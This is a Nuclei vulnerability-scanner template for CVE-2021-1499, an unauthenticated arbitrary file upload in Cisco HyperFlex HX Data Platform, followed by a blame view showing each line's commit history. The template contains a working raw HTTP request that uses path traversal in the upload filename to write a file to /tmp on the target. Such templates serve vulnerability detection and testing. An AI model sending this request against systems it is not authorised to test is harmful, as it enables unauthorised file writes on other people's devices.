nuclei-templates/http/cves/2021/CVE-2021-1499.yaml

id: CVE-2021-1499

info:
  name: Cisco HyperFlex HX Data Platform - Arbitrary File Upload
  author: gy741
  severity: medium
  description: Cisco HyperFlex HX Data Platform contains an arbitrary file upload vulnerability in the web-based management interface. An attacker can send a specific HTTP request to an affected device, thus enabling upload of files to the affected device with the permissions of the tomcat8 user.
  impact: |
    Allows an attacker to upload and execute arbitrary files on the target system
  remediation: |
    Apply the necessary security patches or updates provided by Cisco
  reference:
    - https://swarm.ptsecurity.com/cisco-hyperflex-how-we-got-rce-through-login-form-and-other-findings/
    - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-upload-KtCK8Ugz
    - http://packetstormsecurity.com/files/163203/Cisco-HyperFlex-HX-Data-Platform-File-Upload-Remote-Code-Execution.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-1499
    - https://github.com/Z0fhack/Goby_POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
    cvss-score: 5.3
    cve-id: CVE-2021-1499
    cwe-id: CWE-306
    epss-score: 0.96279
    epss-percentile: 0.99533
    cpe: cpe:2.3:h:cisco:hyperflex_hx220c_af_m5:-:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: cisco
    product: hyperflex_hx220c_af_m5
  tags: cve2021,cve,fileupload,intrusive,packetstorm,cisco

http:
  - raw:
      - |
        POST /upload HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Accept-Encoding: gzip, deflate
        Content-Type: multipart/form-data; boundary=---------------------------253855577425106594691130420583
        Origin: {{RootURL}}
        Referer: {{RootURL}}

        -----------------------------253855577425106594691130420583
        Content-Disposition: form-data; name="file"; filename="../../../../../tmp/passwd9"
        Content-Type: application/json

        MyPasswdNewData->/api/tomcat

        -----------------------------253855577425106594691130420583--

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '{"result":'
          - '"filename:'
          - '/tmp/passwd9'
        condition: and

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100e38f80c4ba37d6ad8f1e127a4526fd195044d8a0beb3acb9716a231adfcb0bb7022019e048850c00a33d4cb35452a239138bd55f8c2b6271a2efbbbca623cba5b449:922c64590222798bb761d5b6d8e72950
Create CVE-2021-1499.yaml A vulnerability in the web-based management interface of Cisco HyperFlex HX Data Platform could allow an unauthenticated, remote attacker to upload files to an affected device. This vulnerability is due to missing authentication for the upload function. An attacker could exploit this vulnerability by sending a specific HTTP request to an affected device. A successful exploit could allow the attacker to upload files to the affected device with the permissions of the tomcat8 user. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2021-10-02 07:29:55 +00:00			`id: CVE-2021-1499`

			`info:`
fix-conflict 2022-10-25 13:40:49 +00:00			`name: Cisco HyperFlex HX Data Platform - Arbitrary File Upload`
Create CVE-2021-1499.yaml A vulnerability in the web-based management interface of Cisco HyperFlex HX Data Platform could allow an unauthenticated, remote attacker to upload files to an affected device. This vulnerability is due to missing authentication for the upload function. An attacker could exploit this vulnerability by sending a specific HTTP request to an affected device. A successful exploit could allow the attacker to upload files to the affected device with the permissions of the tomcat8 user. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2021-10-02 07:29:55 +00:00			`author: gy741`
			`severity: medium`
fix-conflict 2022-10-25 13:40:49 +00:00			`description: Cisco HyperFlex HX Data Platform contains an arbitrary file upload vulnerability in the web-based management interface. An attacker can send a specific HTTP request to an affected device, thus enabling upload of files to the affected device with the permissions of the tomcat8 user.`
Added Impact 2023-09-27 15:51:13 +00:00			`impact: \|`
			`Allows an attacker to upload and execute arbitrary files on the target system`
Updated 2021 CVEs 2023-09-06 12:09:01 +00:00			`remediation: \|`
			`Apply the necessary security patches or updates provided by Cisco`
Create CVE-2021-1499.yaml A vulnerability in the web-based management interface of Cisco HyperFlex HX Data Platform could allow an unauthenticated, remote attacker to upload files to an affected device. This vulnerability is due to missing authentication for the upload function. An attacker could exploit this vulnerability by sending a specific HTTP request to an affected device. A successful exploit could allow the attacker to upload files to the affected device with the permissions of the tomcat8 user. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2021-10-02 07:29:55 +00:00			`reference:`
			`- https://swarm.ptsecurity.com/cisco-hyperflex-how-we-got-rce-through-login-form-and-other-findings/`
additional reference to cves templates (#4395) * additional reference to cves templates * Update CVE-2006-1681.yaml * Update CVE-2009-3318.yaml * Update CVE-2009-4223.yaml * Update CVE-2010-0942.yaml * Update CVE-2010-0944.yaml * Update CVE-2010-0972.yaml * Update CVE-2010-1304.yaml * Update CVE-2010-1308.yaml * Update CVE-2010-1313.yaml * Update CVE-2010-1461.yaml * Update CVE-2010-1470.yaml * Update CVE-2010-1471.yaml * Update CVE-2010-1472.yaml * Update CVE-2010-1474.yaml * removed duplicate references * misc fix Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: Prince Chaddha <cyberbossprince@gmail.com> 2022-05-17 09:18:12 +00:00			`- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-upload-KtCK8Ugz`
			`- http://packetstormsecurity.com/files/163203/Cisco-HyperFlex-HX-Data-Platform-File-Upload-Remote-Code-Execution.html`
fix-conflict 2022-10-25 13:40:49 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2021-1499`
TemplateMan Update [Mon Jan 29 17:11:13 UTC 2024] :robot: 2024-01-29 17:11:14 +00:00			`- https://github.com/Z0fhack/Goby_POC`
Create CVE-2021-1499.yaml A vulnerability in the web-based management interface of Cisco HyperFlex HX Data Platform could allow an unauthenticated, remote attacker to upload files to an affected device. This vulnerability is due to missing authentication for the upload function. An attacker could exploit this vulnerability by sending a specific HTTP request to an affected device. A successful exploit could allow the attacker to upload files to the affected device with the permissions of the tomcat8 user. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2021-10-02 07:29:55 +00:00			`classification:`
additional reference to cves templates (#4395) * additional reference to cves templates * Update CVE-2006-1681.yaml * Update CVE-2009-3318.yaml * Update CVE-2009-4223.yaml * Update CVE-2010-0942.yaml * Update CVE-2010-0944.yaml * Update CVE-2010-0972.yaml * Update CVE-2010-1304.yaml * Update CVE-2010-1308.yaml * Update CVE-2010-1313.yaml * Update CVE-2010-1461.yaml * Update CVE-2010-1470.yaml * Update CVE-2010-1471.yaml * Update CVE-2010-1472.yaml * Update CVE-2010-1474.yaml * removed duplicate references * misc fix Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: Prince Chaddha <cyberbossprince@gmail.com> 2022-05-17 09:18:12 +00:00			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N`
Create CVE-2021-1499.yaml A vulnerability in the web-based management interface of Cisco HyperFlex HX Data Platform could allow an unauthenticated, remote attacker to upload files to an affected device. This vulnerability is due to missing authentication for the upload function. An attacker could exploit this vulnerability by sending a specific HTTP request to an affected device. A successful exploit could allow the attacker to upload files to the affected device with the permissions of the tomcat8 user. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2021-10-02 07:29:55 +00:00			`cvss-score: 5.3`
			`cve-id: CVE-2021-1499`
			`cwe-id: CWE-306`
product/queries updated 2024-05-31 19:23:20 +00:00			`epss-score: 0.96279`
			`epss-percentile: 0.99533`
			`cpe: cpe:2.3:h:cisco:hyperflex_hx220c_af_m5:-:::::::*`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`metadata:`
			`max-request: 1`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`vendor: cisco`
product/queries updated 2024-05-31 19:23:20 +00:00			`product: hyperflex_hx220c_af_m5`
auto tagging via templateman 2024-01-14 09:21:50 +00:00			`tags: cve2021,cve,fileupload,intrusive,packetstorm,cisco`
Update CVE-2021-1499.yaml 2021-10-04 14:39:39 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Create CVE-2021-1499.yaml A vulnerability in the web-based management interface of Cisco HyperFlex HX Data Platform could allow an unauthenticated, remote attacker to upload files to an affected device. This vulnerability is due to missing authentication for the upload function. An attacker could exploit this vulnerability by sending a specific HTTP request to an affected device. A successful exploit could allow the attacker to upload files to the affected device with the permissions of the tomcat8 user. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2021-10-02 07:29:55 +00:00			`- raw:`
			`- \|`
			`POST /upload HTTP/1.1`
			`Host: {{Hostname}}`
			`Accept: /`
			`Accept-Encoding: gzip, deflate`
			`Content-Type: multipart/form-data; boundary=---------------------------253855577425106594691130420583`
misc update 2021-10-02 12:32:45 +00:00			`Origin: {{RootURL}}`
			`Referer: {{RootURL}}`
Create CVE-2021-1499.yaml A vulnerability in the web-based management interface of Cisco HyperFlex HX Data Platform could allow an unauthenticated, remote attacker to upload files to an affected device. This vulnerability is due to missing authentication for the upload function. An attacker could exploit this vulnerability by sending a specific HTTP request to an affected device. A successful exploit could allow the attacker to upload files to the affected device with the permissions of the tomcat8 user. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2021-10-02 07:29:55 +00:00
			`-----------------------------253855577425106594691130420583`
			`Content-Disposition: form-data; name="file"; filename="../../../../../tmp/passwd9"`
			`Content-Type: application/json`

			`MyPasswdNewData->/api/tomcat`

			`-----------------------------253855577425106594691130420583--`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`words:`
Update CVE-2021-1499.yaml 2021-10-04 16:06:06 +00:00			`- '{"result":'`
			`- '"filename:'`
			`- '/tmp/passwd9'`
Create CVE-2021-1499.yaml A vulnerability in the web-based management interface of Cisco HyperFlex HX Data Platform could allow an unauthenticated, remote attacker to upload files to an affected device. This vulnerability is due to missing authentication for the upload function. An attacker could exploit this vulnerability by sending a specific HTTP request to an affected device. A successful exploit could allow the attacker to upload files to the affected device with the permissions of the tomcat8 user. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2021-10-02 07:29:55 +00:00			`condition: and`
fix-conflict 2022-10-25 13:40:49 +00:00
updates 2023-07-05 07:50:14 +00:00			`- type: word`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`part: header`
updates 2023-07-05 07:50:14 +00:00			`words:`
			`- "application/json"`
removed enhanced by comments 2023-07-05 08:07:58 +00:00
updates 2023-07-05 07:50:14 +00:00			`- type: status`
			`status:`
Merge branch 'main' into remove-comments 2023-07-07 11:08:46 +00:00			`- 200`
Auto Template Signing [Mon Mar 25 11:57:16 UTC 2024] :robot: 2024-03-25 11:57:16 +00:00			`# digest: 4a0a00473045022100e38f80c4ba37d6ad8f1e127a4526fd195044d8a0beb3acb9716a231adfcb0bb7022019e048850c00a33d4cb35452a239138bd55f8c2b6271a2efbbbca623cba5b449:922c64590222798bb761d5b6d8e72950`